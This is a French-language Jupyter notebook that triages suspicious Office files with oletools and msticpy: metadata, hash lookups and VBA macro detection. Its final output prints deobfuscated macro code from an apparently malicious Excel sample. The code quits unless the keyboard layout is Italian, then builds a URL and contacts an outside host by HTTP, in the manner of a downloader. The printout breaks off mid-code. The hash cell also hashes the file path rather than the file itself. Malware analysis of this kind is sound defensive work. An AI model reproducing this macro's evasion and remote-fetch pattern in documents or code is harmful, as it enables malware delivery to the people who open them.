# Analyse de document Microsoft Office

Plusieurs types de fichiers sont disponibles au sein de la suite Microsoft Office :
- les **documents OLE**, que nous connaissons tous : 
  - **Excel** : ".xls"
  - **Powerpoint** : ".ppt"
  - **Word** : ".doc"
- les **documents Office Open XML "OOXML"** correspondent à des archives de documents XML (documents compressés). Ce type de document, standardisé via l'ISO/IEC 29500, a été introduit dans la suite Microsoft Office pour la première fois dans la version 2010. 
  - **Excel** : ".xlsx"
  - **Powerpoint** : ".pptx"
  - **Word** : ".docx"
- les documents RTF, ayant pour extension ".rtf"

In [96]:
from colorama import init, Fore, Back, Style
import msticpy as mp
mp.init_notebook(globals(), verbosity=0)
ti = mp.TILookup()


# Chemin du fichier à analyser
officeFile = {}
officeFile['path'] = "/home/secubian/Desktop/Cases/Microsoft_Office/onenot_2623024aba1ee994dcb82e937a8beb59abbebf51b6aa4cde8434bb56458b47da.one"
officeFile['path'] = "/home/secubian/Desktop/Cases/Microsoft_Office/8ed7befccff98a6acb255f63071a6e6ac1410c1d3b08ce560cac3cfe24572c8e.xlsx"
#officeFile['path'] = "/home/secubian/Desktop/Cases/Microsoft_Office/eeb7b78972ba051833135c6ba4215c0faf93d5dfe1c5603f74c777b38867646b.xlsx"
officeFile['path'] = "/home/secubian/Desktop/Cases/Microsoft_Office/5b0f61b42e9a6c238c7028751bf75c484778219cf88a7c5007c2a49e14351e70.xls"


## Analyse des méta données

Il est important d'extraire des informations permettant d'obtenir du contexte sur le document, telles que l'auteur, le logiciel utilisé, les signatures numériques (hash). 

In [126]:
import oletools.oleid
oid = oletools.oleid.OleID(officeFile['path'])
officeFile['oleid'] = {}
indicators = oid.check()
for i in indicators:
    officeFile['oleid'][i.name] = i.value

for indicator in officeFile['oleid']:
    try:
        if (isinstance(officeFile['oleid'][indicator],bool) and officeFile['oleid'][indicator]) or (isinstance(officeFile['oleid'][indicator],int) and officeFile['oleid'][indicator]>0) or(officeFile['oleid'][indicator][0:3] == "Yes"):
            print(Fore.RED + f"[!] {indicator}: {officeFile['oleid'][indicator]}")
    except:
        pass
    finally:
        print(Fore.GREEN + f"[✓] {indicator}: {officeFile['oleid'][indicator]}")

[✓] File format: MS Excel 97-2003 Workbook or Template
[✓] Container format: OLE
[✓] Application name: None
[✓] Properties code page: 1252: ANSI Latin 1; Western European (Windows)
[✓] Author: b'G L S'
[✓] Encrypted: False
[!] VBA Macros: Yes
[✓] VBA Macros: Yes
[✓] XLM Macros: No
[✓] External Relationships: 0
[✓] ObjectPool: False
[✓] Flash objects: 0


Extraction des signatures numériques (HASH), permettant la recherche dans les bases de Threat Intelligence.

In [98]:
import hashlib
officeFile['md5'] = hashlib.md5(officeFile['path'].encode('UTF-8')).hexdigest()
officeFile['sha256'] = hashlib.sha256(officeFile['path'].encode('UTF-8')).hexdigest()

df_ti = ti.lookup_iocs(data=[officeFile['md5'], officeFile['sha256']], providers=["VirusTotal", "OTX"])
#df_ti = df_ti[df_ti['Result']==True]
df_ti = pd.json_normalize(data=df_ti[['Ioc','Provider','Details']].to_dict(orient='records'))

print(Fore.GREEN + "Microsoft Office file HASH.")
print(Fore.GREEN + f"[✓] MD5: \t{officeFile['md5'] } ")
print(Fore.GREEN + f"[✓] SHA256: \t{officeFile['sha256'] }")

if (df_ti.empty):
    print(Fore.GREEN + "[✓] No Potentially identified as malicious")
else:
    print(Fore.RED + "[!] Potentially identified as malicious")
    display(df_ti)


Observables processed:   0%|          | 0/4 [00:00<?, ?obs/s]

Microsoft Office file HASH.
[✓] MD5: 	41c68558278509e42949e8b860966078 
[✓] SHA256: 	64651b5fa3c7d81798075d9941afd77ac9fc0776fded36c1ed75e50d339952c2
[!] Potentially identified as malicious


,Ioc,Provider,Details.pulse_count,Details.sections_available,Details.verbose_msg,Details.response_code,Details.positives,Details.resource,Details.permalink
0,41c68558278509e42949e8b860966078,OTX,0.0,"[general, analysis]",NaN,NaN,NaN,NaN,NaN
1,64651b5fa3c7d81798075d9941afd77ac9fc0776fded36c1ed75e50d339952c2,OTX,0.0,"[general, analysis]",NaN,NaN,NaN,NaN,NaN
2,41c68558278509e42949e8b860966078,VirusTotal,NaN,NaN,"The requested resource is not among the finished, queued or pending scans",0.0,0.0,41c68558278509e42949e8b860966078,NaN
3,64651b5fa3c7d81798075d9941afd77ac9fc0776fded36c1ed75e50d339952c2,VirusTotal,NaN,NaN,"The requested resource is not among the finished, queued or pending scans",0.0,0.0,64651b5fa3c7d81798075d9941afd77ac9fc0776fded36c1ed75e50d339952c2,NaN


## Extraction et Analyse des macros

Les macros sont des éléments permettant d'exécuter des morceaux de code à l'ouverture du document ou à lors d'événements bien précis.

In [132]:
# https://github.com/decalage2/oletools/wiki/olevba
from oletools.olevba import VBA_Parser, TYPE_OLE, TYPE_OpenXML, TYPE_Word2003_XML, TYPE_MHTML
vbaparser = VBA_Parser(officeFile['path'])

if vbaparser.detect_vba_macros():
    print(Fore.RED + "[!] VBA Macros found")
    results = vbaparser.analyze_macros()
    print(Fore.RED + f"[!] AutoExec keywords: {vbaparser.nb_autoexec}")
    print(Fore.RED + f"[!] IOCs: {vbaparser.nb_iocs}")
    print(Fore.RED + f"[!] Hex obfuscated strings: {vbaparser.nb_hexstrings}")
    print(Fore.RED + f"[!] Base64 obfuscated strings: {vbaparser.nb_base64strings}")
    print(Fore.RED + f"[!] Dridex obfuscated strings: {vbaparser.nb_dridexstrings}")
    print(Fore.RED + f"[!] VBA obfuscated strings: {vbaparser.nb_vbastrings}")

    print("\n")
    print(Fore.RED + f"[!] Suspicious patterns : {vbaparser.nb_suspicious}")
    for kw_type, keyword, description in results:
        #print('type=%s - keyword=%s - description=%s' % (kw_type, keyword, description))
        print(f"[{kw_type}] - {keyword} : {description}")
else:
    print(Fore.GREEN + "[✓] No VBA Macros found")


[!] VBA Macros found
[!] AutoExec keywords: 0
[!] IOCs: 1
[!] Hex obfuscated strings: 4
[!] Base64 obfuscated strings: 1
[!] Dridex obfuscated strings: 0
[!] VBA obfuscated strings: 0


[!] Suspicious patterns : 14
[Suspicious] - Environ : May read system environment variables
[Suspicious] - Open : May open a file
[Suspicious] - Write : May write to a file (if combined with Open)
[Suspicious] - Output : May write to a file (if combined with Open)
[Suspicious] - ADODB.Stream : May create a text file
[Suspicious] - SaveToFile : May create a text file
[Suspicious] - shell : May run an executable file or a system command
[Suspicious] - wscript.shell : May run an executable file or a system command
[Suspicious] - Run : May run an executable file or a system command
[Suspicious] - CreateObject : May create an OLE object
[Suspicious] - Lib : May run code from a DLL
[Suspicious] - MSXML2.XMLHTTP : May download files from the Internet
[Suspicious] - Hex Strings : Hex-encoded strings were detect

Cette tentative se base sur les résultats obtenus précédemments. Si aucune chaine obfusquée n'a été détectée, aucun résultat ne sera obtenu.

In [127]:
# https://github.com/decalage2/oletools/wiki/olevba
if vbaparser.nb_hexstrings or vbaparser.nb_base64strings or vbaparser.nb_dridexstrings or vbaparser.nb_vbastrings:
    print()
    print(Fore.RED + vbaparser.reveal())
else:
    print(Fore.GREEN + "[✓] No VBA obfuscated strings found")



Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Const rrv As Long = 9

Private Declare PtrSafe Function KLayoutN Lib "user32"     Alias "GetKeyboardLayoutNameA" (     ByVal pwszKLID As String) As Long
    


Sub generale()
 
    Dim sB As String
    
    sB = Space(rrv - 1)
    KLayoutN sB
    If CSng(Right(sB, 2)) <> 10 Then Workbooks.Application.DisplayAlerts = False: Application.Quit
    info_servizi "IT"


End Sub

Sub info_servizi(Aaa)
Orios = msoShapeStylePreset32
Dim oXHTTP As Object
Set oXHTTP = CreateObject("MSXML2.XMLHTTP")
KioER = "http://inter" & Aaa & Orios & ".com"
oXHTTP.Open "get", KioER, False
oXHTTP.setRequestHeader "Akamai-GRN", "fetch"
oXHTTP.send

Glow = ",#" & Len(oXHTTP.getResponseHeader("Akamai-GRN"))

        Se